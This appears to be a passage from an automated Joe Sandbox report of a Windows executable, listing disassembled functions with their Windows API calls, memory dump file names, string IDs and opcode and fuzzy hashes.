                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                  • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                  • Opcode ID: b1dee99ba52bfdd7fa51214da9dcdc86a2f74c8eadbc490bc8544f0a28995bbf
                                                                                                                                                                                                                                                                  • Instruction ID: 417b6a557ea8c29d70a39bb141389193b3dee0362bf6e94cd8b2282f1e61500b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1dee99ba52bfdd7fa51214da9dcdc86a2f74c8eadbc490bc8544f0a28995bbf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE619E71608701EFC310DF64C889B6ABBE4EF49714F140909F9859B2A1DB70ED88CBB6
                                                                                                                                                                                                                                                                  Function 00D58BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00D58C9C
                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D58CAC
                                                                                                                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D58CB8
                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D58D55
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D58D69
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D58D9B
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00D58DD1
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D58DDA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                                                  • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                  • Opcode ID: 7b4646ad621c0b87c776c9e31f89fad47fce48ae4cd2ced62e587117faec8eb4
                                                                                                                                                                                                                                                                  • Instruction ID: eb299639638419660304ea5f1bbb110338db84800ec9de87aac68f1bfe297442
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b4646ad621c0b87c776c9e31f89fad47fce48ae4cd2ced62e587117faec8eb4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21616972504345AFCB10EF60C8859AEB3E9FF99310F04481EF989D7251EB35E949DBA2
                                                                                                                                                                                                                                                                  Function 00D746E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateMenu.USER32 ref: 00D74715
                                                                                                                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00D74724
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D747AC
                                                                                                                                                                                                                                                                  • IsMenu.USER32(?), ref: 00D747C0
                                                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00D747CA
                                                                                                                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D747F7
                                                                                                                                                                                                                                                                  • DrawMenuBar.USER32 ref: 00D747FF
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                  • String ID: 0$F
                                                                                                                                                                                                                                                                  • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                  • Opcode ID: 29252d2d6cd52b1257908546ba32161e6a92bbf97c820aafbad756c5a4f862de
                                                                                                                                                                                                                                                                  • Instruction ID: 296346c63cb5052e37320fb5a70acf588b4eec751ff3b7290fa8e4394af3cbda
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29252d2d6cd52b1257908546ba32161e6a92bbf97c820aafbad756c5a4f862de
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83415B75A01309EFDF15DF64D884AAA7BB6FF49314F148028FA4997360E770A914CF60
                                                                                                                                                                                                                                                                  Function 00D4282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00D428B1
                                                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 00D428BC
                                                                                                                                                                                                                                                                  • GetParent.USER32 ref: 00D428D8
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D428DB
                                                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00D428E4
                                                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00D428F8
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D428FB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                  • Opcode ID: a70604fa1e05eb7d8893ffad20ac0b99ae00fbc02633b1a91d8b9ed381f18122
                                                                                                                                                                                                                                                                  • Instruction ID: e7dc58a18bc5934da25082218bdb09380eaf9a2b14be37df4948c8926eb4290e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a70604fa1e05eb7d8893ffad20ac0b99ae00fbc02633b1a91d8b9ed381f18122
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C21CF74900218BFCF05AFA0CC85EFEBBB9EF0A350F500156B961A32A1DB758858DB70
                                                                                                                                                                                                                                                                  Function 00D4290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00D42990
                                                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 00D4299B
                                                                                                                                                                                                                                                                  • GetParent.USER32 ref: 00D429B7
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D429BA
                                                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00D429C3
                                                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00D429D7
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D429DA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                  • Opcode ID: d1c975f4958dec2bfd8afedf56a33377028544d738c27584f8c8b81b813f507a
                                                                                                                                                                                                                                                                  • Instruction ID: 8fbba227e2b7e3e5fca1b80235f6110459b20351b6911eb717a0bef1a70c6803
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1c975f4958dec2bfd8afedf56a33377028544d738c27584f8c8b81b813f507a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A21DE75940218BBCF05AFA0CC85EFEBBB9EF05310F504016B991A32A1DB758948DB70
                                                                                                                                                                                                                                                                  Function 00D744BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D74539
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00D7453C
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D74563
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D74586
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00D745FE
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00D74648
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00D74663
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00D7467E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00D74692
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00D746AF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 312131281-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5254649e07b29669af011c4b342dad86ac17456537f2c7d59041d2b120680a76
                                                                                                                                                                                                                                                                  • Instruction ID: 50440489903c153e48b12d0ff103610241c3cf7135d21265f36ace65e06b3864
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5254649e07b29669af011c4b342dad86ac17456537f2c7d59041d2b120680a76
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1615875A00208AFDB11DFA8CC81EEE77B8EF09710F144159FA19E73A1E774AA45DB60
                                                                                                                                                                                                                                                                  Function 00D4BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D4BB18
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BB2C
                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00D4BB33
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BB42
                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D4BB54
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BB6D
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BB7F
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BBC4
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BBD9
                                                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00D4ABA8,?,00000001), ref: 00D4BBE4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4c10dd44cc6e8f93a71b47ed95c253217cd9cd2af7b8a17168e8e54deb042e6f
                                                                                                                                                                                                                                                                  • Instruction ID: d4f2783b73f55c90b721fda8b0f809db800f00348df4a93ae67ee66179d524c0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c10dd44cc6e8f93a71b47ed95c253217cd9cd2af7b8a17168e8e54deb042e6f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9315C72904308EFDB10EF24DC88F6977BAEF64322F144116FA09D62A5D7B4D9808B71
                                                                                                                                                                                                                                                                  Function 00D12FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13007
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4), ref: 00D12D4E
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: GetLastError.KERNEL32(00DB1DC4,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4,00DB1DC4), ref: 00D12D60
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13013
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1301E
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13029
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13034
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1303F
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1304A
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13055
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13060
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1306E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: 326097f1913ad8aa3c1a811450a33324be7dce406767d6edd5d5b12074e5749f
                                                                                                                                                                                                                                                                  • Instruction ID: e85681ebf553c7bd8b251279c2bae1a53ce9c2ba10d62a24233513f074f203f5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 326097f1913ad8aa3c1a811450a33324be7dce406767d6edd5d5b12074e5749f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D81159B6510108BFCB01EF95E942DED3BA5EF05350B9145A5F9089F222DA32DFA19BB0
                                                                                                                                                                                                                                                                  Function 00CE2AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00CE2AF9
                                                                                                                                                                                                                                                                  • OleUninitialize.OLE32(?,00000000), ref: 00CE2B98
                                                                                                                                                                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00CE2D7D
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00D23A1B
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00D23A80
                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D23AAD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                  • String ID: close all
                                                                                                                                                                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                  • Opcode ID: e3f9ffe743fb63107a99b073c64104cb101933003c30973d0d305b522995cbb9
                                                                                                                                                                                                                                                                  • Instruction ID: c713e0be77a2db197983dfa067b818f4ccea3cea9627b8e2929419de3f0a96e0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3f9ffe743fb63107a99b073c64104cb101933003c30973d0d305b522995cbb9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29D169716012629FCB29EF16D845B29F7B4EF14714F1442ADE94AAB261CB30EE12CF60
                                                                                                                                                                                                                                                                  Function 00D58835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D589F2
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D58A06
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00D58A30
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00D58A4A
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D58A5C
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D58AA5
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00D58AF5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                                                  • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                  • Opcode ID: 512a95c43abd855fb2542b782e06cb8d7330ca4a27da11992ae3fc2fac354558
                                                                                                                                                                                                                                                                  • Instruction ID: be96bf3974e44f1711d927b36748fc15cffd713854612d7c7109f63c55835474
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 512a95c43abd855fb2542b782e06cb8d7330ca4a27da11992ae3fc2fac354558
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93818E729043459BCF24EE14C444ABAB7E8BF84352F58481AFC89E7251DF34D949AFA2
                                                                                                                                                                                                                                                                  Function 00CE7447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00CE74D7
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7567: GetClientRect.USER32(?,?), ref: 00CE758D
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE7567: GetWindowRect.USER32(?,?), ref: 00CE75CE
